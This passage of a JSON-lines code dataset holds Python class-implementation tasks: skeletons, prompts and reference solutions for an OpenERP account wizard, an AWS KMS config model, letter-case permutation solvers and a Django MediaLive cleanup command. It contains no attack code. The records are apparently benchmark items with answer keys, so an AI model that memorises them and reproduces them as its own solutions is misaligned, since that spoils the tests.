ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n child_ids = obj_account._get_children_and_consol(cr, uid, [data['chart_account_id'][0]], context)\n consild = []\n for acc in obj_account.browse(cr, uid, child_ids, context=context):\n if acc.type in ('other', 'receivable', 'payable', 'closed', 'liquidity'):\n consild.append(acc.id)\n all_accounts = obj_account.search(cr, uid, [('type', 'in', ('other', 'receivable', 'payable', 'closed', 'liquidity'))], context=context)\n if data['type'] == 'diff':\n account_ids = list(set(all_accounts) - set(consild))\n else:\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n account_ids = []\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n cons = obj_account._get_children_and_consol(cr, uid, [acc.id], context)\n account_ids += cons\n account_ids = self.uniq(cr, uid, account_ids)\n return {'domain': \"[('id','in',%s)]\" % account_ids, 'name': 'Accounts', 'view_type': 'form', 'view_mode': 'tree,form', 'view_id': False, 'res_model': 'account.account', 'type': 'ir.actions.act_window'}\n\n def update_consil(self, cr, uid, ids, context=None):\n \"\"\"Update the consolidation account by add accounts from diffrent chart of account to consolidate account depend on code of account @return: dictionary of values\"\"\"\n if context is None:\n context = {}\n data = self.read(cr, uid, ids, context=context)[0]\n obj_account = self.pool.get('account.account')\n chart = obj_account.browse(cr, uid, data['chart_account_id'][0], context)\n consoli = obj_account.search(cr, uid, [('type', '=', 'consolidation'), ('company_id', '=', chart.company_id.id)], context=context)\n for acc in obj_account.browse(cr, uid, consoli, context=context):\n new_child_ids = obj_account.search(cr, uid, [('code', '=', acc.code), ('company_id', '<>', acc.company_id.id)], context=context)\n obj_account.write(cr, uid, acc.id, {'child_consol_ids': [(6, 0, new_child_ids)]}, context=context)\n return {}\n", "source": "the_stack_v2_python_sparse", "source_path": "v_7/GDS/common_shamil_v3/account_custom/wizard/account_tree.py", "source_repo": "musabahmed/baba", "split": "test", "star_events_count": 0} {"blob_id": "af01f5fd79cc664a79cbc881d9b21e07ff36c642", "bodies": ["self.access_key_id = access_key_id\nself.auth_method = auth_method\nself.ca_certificate = ca_certificate\nself.cmk_alias = cmk_alias\nself.cmk_arn = cmk_arn\nself.cmk_key_id = cmk_key_id\nself.iam_role_arn = iam_role_arn\nself.region = region\nself.secret_access_key = secret_access_key\nself.verify_s_s_l = verify_s_s_l", "if dictionary is None:\n return None\naccess_key_id = dictionary.get('accessKeyId')\nauth_method = dictionary.get('authMethod')\nca_certificate = dictionary.get('caCertificate')\ncmk_alias = dictionary.get('cmkAlias')\ncmk_arn = dictionary.get('cmkArn')\ncmk_key_id = dictionary.get('cmkKeyId')\niam_role_arn = dictionary.get('iamRoleArn')\nregion = dictionary.get('region')\nsecret_access_key = dictionary.get('secretAccessKey')\nverify_s_s_l = dictionary.get('verifySSL')\nreturn cls(access_key_id, auth_method, ca_certificate, cmk_alias, cmk_arn, cmk_key_id, iam_role_arn, region, secret_access_key, verify_s_s_l)"], "bodies_text": "<|body_start_0|>\n self.access_key_id = access_key_id\n self.auth_method = auth_method\n self.ca_certificate = ca_certificate\n self.cmk_alias = cmk_alias\n self.cmk_arn = cmk_arn\n self.cmk_key_id = cmk_key_id\n self.iam_role_arn = iam_role_arn\n self.region = region\n self.secret_access_key = secret_access_key\n self.verify_s_s_l = verify_s_s_l\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n access_key_id = dictionary.get('accessKeyId')\n auth_method = dictionary.get('authMethod')\n ca_certificate = dictionary.get('caCertificate')\n cmk_alias = dictionary.get('cmkAlias')\n cmk_arn = dictionary.get('cmkArn')\n cmk_key_id = dictionary.get('cmkKeyId')\n iam_role_arn = dictionary.get('iamRoleArn')\n region = dictionary.get('region')\n secret_access_key = dictionary.get('secretAccessKey')\n verify_s_s_l = dictionary.get('verifySSL')\n return cls(access_key_id, auth_method, ca_certificate, cmk_alias, cmk_arn, cmk_key_id, iam_role_arn, region, secret_access_key, verify_s_s_l)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):", "class_name": "AwsKmsConfiguration", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AwsKmsConfiguration:\n \"\"\"Implementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):\"\"\"\n\n def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None):\n \"\"\"Constructor for the AwsKmsConfiguration class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.access_key_id = access_key_id\n self.auth_method = auth_method\n self.ca_certificate = ca_certificate\n self.cmk_alias = cmk_alias\n self.cmk_arn = cmk_arn\n self.cmk_key_id = cmk_key_id\n self.iam_role_arn = iam_role_arn\n self.region = region\n self.secret_access_key = secret_access_key\n self.verify_s_s_l = verify_s_s_l\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n access_key_id = dictionary.get('accessKeyId')\n auth_method = dictionary.get('authMethod')\n ca_certificate = dictionary.get('caCertificate')\n cmk_alias = dictionary.get('cmkAlias')\n cmk_arn = dictionary.get('cmkArn')\n cmk_key_id = dictionary.get('cmkKeyId')\n iam_role_arn = dictionary.get('iamRoleArn')\n region = dictionary.get('region')\n secret_access_key = dictionary.get('secretAccessKey')\n verify_s_s_l = dictionary.get('verifySSL')\n return cls(access_key_id, auth_method, ca_certificate, cmk_alias, cmk_arn, cmk_key_id, iam_role_arn, region, secret_access_key, verify_s_s_l)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000413", "length_bytes": 4533, "license_type": "permissive", "methods": [{"docstring": "Constructor for the AwsKmsConfiguration class", "name": "__init__", "signature": "def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `AwsKmsConfiguration` described below.\n\nClass description:\nImplementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):\n\nMethod signatures and docstrings:\n- def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None): Constructor for the AwsKmsConfiguration class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `AwsKmsConfiguration` described below.\n\nClass description:\nImplementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):\n\nMethod signatures and docstrings:\n- def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None): Constructor for the AwsKmsConfiguration class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass AwsKmsConfiguration:\n \"\"\"Implementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):\"\"\"\n\n def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None):\n \"\"\"Constructor for the AwsKmsConfiguration class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.access_key_id = access_key_id\n self.auth_method = auth_method\n self.ca_certificate = ca_certificate\n self.cmk_alias = cmk_alias\n self.cmk_arn = cmk_arn\n self.cmk_key_id = cmk_key_id\n self.iam_role_arn = iam_role_arn\n self.region = region\n self.secret_access_key = secret_access_key\n self.verify_s_s_l = verify_s_s_l\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n access_key_id = dictionary.get('accessKeyId')\n auth_method = dictionary.get('authMethod')\n ca_certificate = dictionary.get('caCertificate')\n cmk_alias = dictionary.get('cmkAlias')\n cmk_arn = dictionary.get('cmkArn')\n cmk_key_id = dictionary.get('cmkKeyId')\n iam_role_arn = dictionary.get('iamRoleArn')\n region = dictionary.get('region')\n secret_access_key = dictionary.get('secretAccessKey')\n verify_s_s_l = dictionary.get('verifySSL')\n return cls(access_key_id, auth_method, ca_certificate, cmk_alias, cmk_arn, cmk_key_id, iam_role_arn, region, secret_access_key, verify_s_s_l)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass AwsKmsConfiguration:\n \"\"\"Implementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):\"\"\"\n\n def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None):\n \"\"\"Constructor for the AwsKmsConfiguration class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AwsKmsConfiguration:\n \"\"\"Implementation of the 'AwsKmsConfiguration' model. TODO: type description here. Attributes: access_key_id (string): Access key id needed to access the cloud account. When update cluster config, should encrypte accessKeyId with cluster ID. auth_method (AuthMethodEnum): Specifies the authentication method to be used for API calls. Specifies the authentication method to be used for API calls. 'kUseIAMUser' indicates a user based authentication. 'kUseIAMRole' indicates a role based authentication, used only for AWS CE. 'kUseHelios' indicates a Helios based authentication. ca_certificate (string): Specify the ca certificate path. cmk_alias (string): The string alias of the CMK. cmk_arn (string):\"\"\"\n\n def __init__(self, access_key_id=None, auth_method=None, ca_certificate=None, cmk_alias=None, cmk_arn=None, cmk_key_id=None, iam_role_arn=None, region=None, secret_access_key=None, verify_s_s_l=None):\n \"\"\"Constructor for the AwsKmsConfiguration class\"\"\"\n self.access_key_id = access_key_id\n self.auth_method = auth_method\n self.ca_certificate = ca_certificate\n self.cmk_alias = cmk_alias\n self.cmk_arn = cmk_arn\n self.cmk_key_id = cmk_key_id\n self.iam_role_arn = iam_role_arn\n self.region = region\n self.secret_access_key = secret_access_key\n self.verify_s_s_l = verify_s_s_l\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n access_key_id = dictionary.get('accessKeyId')\n auth_method = dictionary.get('authMethod')\n ca_certificate = dictionary.get('caCertificate')\n cmk_alias = dictionary.get('cmkAlias')\n cmk_arn = dictionary.get('cmkArn')\n cmk_key_id = dictionary.get('cmkKeyId')\n iam_role_arn = dictionary.get('iamRoleArn')\n region = dictionary.get('region')\n secret_access_key = dictionary.get('secretAccessKey')\n verify_s_s_l = dictionary.get('verifySSL')\n return cls(access_key_id, auth_method, ca_certificate, cmk_alias, cmk_arn, cmk_key_id, iam_role_arn, region, secret_access_key, verify_s_s_l)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/aws_kms_configuration.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "f12217cde314af78647de5b541f82c4004fde46f", "bodies": ["res = ['']\nfor ch in S:\n l = []\n for item in res:\n if ch.isdigit():\n l.append('%s%s' % (item, ch))\n else:\n l.append('%s%s' % (item, ch.lower()))\n l.append('%s%s' % (item, ch.upper()))\n res = l\nreturn res", "length = len(S)\nif length == 0:\n return ['']\nimport collections\nqueue = collections.deque()\nqueue.append('')\nlevel = -1\nwhile True:\n level += 1\n if level == length:\n break\n for k in range(len(queue)):\n ch = S[level]\n element = queue.popleft()\n if ch.isdigit():\n queue.append('%s%s' % (element, ch))\n else:\n queue.append('%s%s' % (element, ch.lower()))\n queue.append('%s%s' % (element, ch.upper()))\nreturn list(queue)", "length = len(S)\nif length == 0:\n return ['']\nres = []\nch = S[0]\nfor item in self.letterCasePermutation(S[1:]):\n if ch.isdigit():\n res.append('%s%s' % (ch, item))\n else:\n res.append('%s%s' % (ch.lower(), item))\n res.append('%s%s' % (ch.upper(), item))\nreturn res"], "bodies_text": "<|body_start_0|>\n res = ['']\n for ch in S:\n l = []\n for item in res:\n if ch.isdigit():\n l.append('%s%s' % (item, ch))\n else:\n l.append('%s%s' % (item, ch.lower()))\n l.append('%s%s' % (item, ch.upper()))\n res = l\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(S)\n if length == 0:\n return ['']\n import collections\n queue = collections.deque()\n queue.append('')\n level = -1\n while True:\n level += 1\n if level == length:\n break\n for k in range(len(queue)):\n ch = S[level]\n element = queue.popleft()\n if ch.isdigit():\n queue.append('%s%s' % (element, ch))\n else:\n queue.append('%s%s' % (element, ch.lower()))\n queue.append('%s%s' % (element, ch.upper()))\n return list(queue)\n<|end_body_1|>\n\n<|body_start_2|>\n length = len(S)\n if length == 0:\n return ['']\n res = []\n ch = S[0]\n for item in self.letterCasePermutation(S[1:]):\n if ch.isdigit():\n res.append('%s%s' % (ch, item))\n else:\n res.append('%s%s' % (ch.lower(), item))\n res.append('%s%s' % (ch.upper(), item))\n return res\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def letterCasePermutation(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_0|>\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_1|>\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = ['']\n for ch in S:\n l = []\n for item in res:\n if ch.isdigit():\n l.append('%s%s' % (item, ch))\n else:\n l.append('%s%s' % (item, ch.lower()))\n l.append('%s%s' % (item, ch.upper()))\n res = l\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(S)\n if length == 0:\n return ['']\n import collections\n queue = collections.deque()\n queue.append('')\n level = -1\n while True:\n level += 1\n if level == length:\n break\n for k in range(len(queue)):\n ch = S[level]\n element = queue.popleft()\n if ch.isdigit():\n queue.append('%s%s' % (element, ch))\n else:\n queue.append('%s%s' % (element, ch.lower()))\n queue.append('%s%s' % (element, ch.upper()))\n return list(queue)\n<|end_body_1|>\n\n<|body_start_2|>\n length = len(S)\n if length == 0:\n return ['']\n res = []\n ch = S[0]\n for item in self.letterCasePermutation(S[1:]):\n if ch.isdigit():\n res.append('%s%s' % (ch, item))\n else:\n res.append('%s%s' % (ch.lower(), item))\n res.append('%s%s' % (ch.upper(), item))\n return res\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000414", "length_bytes": 3222, "license_type": "no_license", "methods": [{"docstring": ":type S: str :rtype: List[str]", "name": "letterCasePermutation", "signature": "def letterCasePermutation(self, S)"}, {"docstring": ":type S: str :rtype: List[str]", "name": "letterCasePermutation_v1", "signature": "def letterCasePermutation_v1(self, S)"}, {"docstring": ":type S: str :rtype: List[str]", "name": "letterCasePermutation_v1", "signature": "def letterCasePermutation_v1(self, S)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007199", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def letterCasePermutation(self, S): :type S: str :rtype: List[str]\n- def letterCasePermutation_v1(self, S): :type S: str :rtype: List[str]\n- def letterCasePermutation_v1(self, S): :type S: str :rtype: List[str]", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def letterCasePermutation(self, S): :type S: str :rtype: List[str]\n- def letterCasePermutation_v1(self, S): :type S: str :rtype: List[str]\n- def letterCasePermutation_v1(self, S): :type S: str :rtype: List[str]\n\n<|skeleton|>\nclass Solution:\n\n def letterCasePermutation(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_0|>\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_1|>\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = ['']\n for ch in S:\n l = []\n for item in res:\n if ch.isdigit():\n l.append('%s%s' % (item, ch))\n else:\n l.append('%s%s' % (item, ch.lower()))\n l.append('%s%s' % (item, ch.upper()))\n res = l\n return res\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(S)\n if length == 0:\n return ['']\n import collections\n queue = collections.deque()\n queue.append('')\n level = -1\n while True:\n level += 1\n if level == length:\n break\n for k in range(len(queue)):\n ch = S[level]\n element = queue.popleft()\n if ch.isdigit():\n queue.append('%s%s' % (element, ch))\n else:\n queue.append('%s%s' % (element, ch.lower()))\n queue.append('%s%s' % (element, ch.upper()))\n return list(queue)\n<|end_body_1|>\n\n<|body_start_2|>\n length = len(S)\n if length == 0:\n return ['']\n res = []\n ch = S[0]\n for item in self.letterCasePermutation(S[1:]):\n if ch.isdigit():\n res.append('%s%s' % (ch, item))\n else:\n res.append('%s%s' % (ch.lower(), item))\n res.append('%s%s' % (ch.upper(), item))\n return res\n<|end_body_2|>\n", "revision_id": "98fb752c574a6ec5961a274e41a44275b56da194", "skeleton": "<|skeleton|>\nclass Solution:\n\n def letterCasePermutation(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_0|>\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_1|>\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def letterCasePermutation(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n res = ['']\n for ch in S:\n l = []\n for item in res:\n if ch.isdigit():\n l.append('%s%s' % (item, ch))\n else:\n l.append('%s%s' % (item, ch.lower()))\n l.append('%s%s' % (item, ch.upper()))\n res = l\n return res\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n length = len(S)\n if length == 0:\n return ['']\n import collections\n queue = collections.deque()\n queue.append('')\n level = -1\n while True:\n level += 1\n if level == length:\n break\n for k in range(len(queue)):\n ch = S[level]\n element = queue.popleft()\n if ch.isdigit():\n queue.append('%s%s' % (element, ch))\n else:\n queue.append('%s%s' % (element, ch.lower()))\n queue.append('%s%s' % (element, ch.upper()))\n return list(queue)\n\n def letterCasePermutation_v1(self, S):\n \"\"\":type S: str :rtype: List[str]\"\"\"\n length = len(S)\n if length == 0:\n return ['']\n res = []\n ch = S[0]\n for item in self.letterCasePermutation(S[1:]):\n if ch.isdigit():\n res.append('%s%s' % (ch, item))\n else:\n res.append('%s%s' % (ch.lower(), item))\n res.append('%s%s' % (ch.upper(), item))\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "Challenges/letterCasePermutation.py", "source_repo": "AusCommsteam/Algorithm-and-Data-Structures-and-Coding-Challenges", "split": "test", "star_events_count": 0} {"blob_id": "25ffbaeb0c583799a0f7dd43eb4b845a30dab815", "bodies": ["expired_date = generate_expired_date()\nfor medialive_channel in list_medialive_channels():\n if medialive_channel.get('Tags', {}).get('environment') != settings.AWS_BASE_NAME:\n continue\n if medialive_channel.get('State') != 'IDLE':\n continue\n _environment, live_pk, _stamp = medialive_channel['Name'].split('_')\n try:\n live = Video.objects.get(pk=live_pk)\n self.stdout.write(f'Checking video {live.id}')\n if live.get_medialive_channel().get('id') != medialive_channel['Id']:\n self.stdout.write(f\"The video {live.id} is not attached to the channel {medialive_channel['Name']}\")\n delete_medialive_stack(medialive_channel, self.stdout)\n continue\n if live.starting_at:\n if live.starting_at < expired_date:\n self._delete_live(live, medialive_channel)\n elif (started_at := live.live_info.get('started_at')):\n started_at = to_datetime(started_at)\n if started_at < expired_date:\n self._delete_live(live, medialive_channel)\n except Video.DoesNotExist:\n self.stdout.write(f\"Channel {medialive_channel['Name']} is attached to a video {live_pk} that does not exist\")\n delete_medialive_stack(medialive_channel, self.stdout)", "self.stdout.write(f'deleting AWS resources for video {live.id}')\ndelete_medialive_stack(medialive_channel, self.stdout)\nself.stdout.write(f'Set video state to deleted for video {live.id}')\nlive.live_state = ENDED\nlive.upload_state = DELETED\nlive.live_info.pop('medialive')\nlive.live_info.pop('mediapackage')\nlive.save(update_fields=('live_state', 'upload_state', 'live_info'))"], "bodies_text": "<|body_start_0|>\n expired_date = generate_expired_date()\n for medialive_channel in list_medialive_channels():\n if medialive_channel.get('Tags', {}).get('environment') != settings.AWS_BASE_NAME:\n continue\n if medialive_channel.get('State') != 'IDLE':\n continue\n _environment, live_pk, _stamp = medialive_channel['Name'].split('_')\n try:\n live = Video.objects.get(pk=live_pk)\n self.stdout.write(f'Checking video {live.id}')\n if live.get_medialive_channel().get('id') != medialive_channel['Id']:\n self.stdout.write(f\"The video {live.id} is not attached to the channel {medialive_channel['Name']}\")\n delete_medialive_stack(medialive_channel, self.stdout)\n continue\n if live.starting_at:\n if live.starting_at < expired_date:\n self._delete_live(live, medialive_channel)\n elif (started_at := live.live_info.get('started_at')):\n started_at = to_datetime(started_at)\n if started_at < expired_date:\n self._delete_live(live, medialive_channel)\n except Video.DoesNotExist:\n self.stdout.write(f\"Channel {medialive_channel['Name']} is attached to a video {live_pk} that does not exist\")\n delete_medialive_stack(medialive_channel, self.stdout)\n<|end_body_0|>\n\n<|body_start_1|>\n self.stdout.write(f'deleting AWS resources for video {live.id}')\n delete_medialive_stack(medialive_channel, self.stdout)\n self.stdout.write(f'Set video state to deleted for video {live.id}')\n live.live_state = ENDED\n live.upload_state = DELETED\n live.live_info.pop('medialive')\n live.live_info.pop('mediapackage')\n live.save(update_fields=('live_state', 'upload_state', 'live_info'))\n<|end_body_1|>\n", "class_docstring": "Once a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.", "class_name": "Command", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Command:\n \"\"\"Once a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.\"\"\"\n\n def handle(self, *args, **options):\n \"\"\"Execute management command.\"\"\"\n <|body_0|>\n\n def _delete_live(self, live, medialive_channel):\n \"\"\"Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n expired_date = generate_expired_date()\n for medialive_channel in list_medialive_channels():\n if medialive_channel.get('Tags', {}).get('environment') != settings.AWS_BASE_NAME:\n continue\n if medialive_channel.get('State') != 'IDLE':\n continue\n _environment, live_pk, _stamp = medialive_channel['Name'].split('_')\n try:\n live = Video.objects.get(pk=live_pk)\n self.stdout.write(f'Checking video {live.id}')\n if live.get_medialive_channel().get('id') != medialive_channel['Id']:\n self.stdout.write(f\"The video {live.id} is not attached to the channel {medialive_channel['Name']}\")\n delete_medialive_stack(medialive_channel, self.stdout)\n continue\n if live.starting_at:\n if live.starting_at < expired_date:\n self._delete_live(live, medialive_channel)\n elif (started_at := live.live_info.get('started_at')):\n started_at = to_datetime(started_at)\n if started_at < expired_date:\n self._delete_live(live, medialive_channel)\n except Video.DoesNotExist:\n self.stdout.write(f\"Channel {medialive_channel['Name']} is attached to a video {live_pk} that does not exist\")\n delete_medialive_stack(medialive_channel, self.stdout)\n<|end_body_0|>\n\n<|body_start_1|>\n self.stdout.write(f'deleting AWS resources for video {live.id}')\n delete_medialive_stack(medialive_channel, self.stdout)\n self.stdout.write(f'Set video state to deleted for video {live.id}')\n live.live_state = ENDED\n live.upload_state = DELETED\n live.live_info.pop('medialive')\n live.live_info.pop('mediapackage')\n live.save(update_fields=('live_state', 'upload_state', 'live_info'))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000415", "length_bytes": 4123, "license_type": "permissive", "methods": [{"docstring": "Execute management command.", "name": "handle", "signature": "def handle(self, *args, **options)"}, {"docstring": "Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources", "name": "_delete_live", "signature": "def _delete_live(self, live, medialive_channel)"}], "n_methods": 2, "prompt": "Implement the Python class `Command` described below.\n\nClass description:\nOnce a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.\n\nMethod signatures and docstrings:\n- def handle(self, *args, **options): Execute management command.\n- def _delete_live(self, live, medialive_channel): Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources", "prompted_full_text": "Implement the Python class `Command` described below.\n\nClass description:\nOnce a live started, all AWS elemental stack are created. Once stopped, the instructor must do an action. Restart it and/or convert it in VOD. If nothing is done, the AWS element resources are leaved unused and use the quota we have on our AWS account. These unused resources must be removed after several days of inactivity and the video move in a DELETED state.\n\nMethod signatures and docstrings:\n- def handle(self, *args, **options): Execute management command.\n- def _delete_live(self, live, medialive_channel): Set the live_state to ENDED, the upload_state to DELETED and delete all AWS resources\n\n<|skeleton|>\nclass Command:\n \"\"\"Once a live 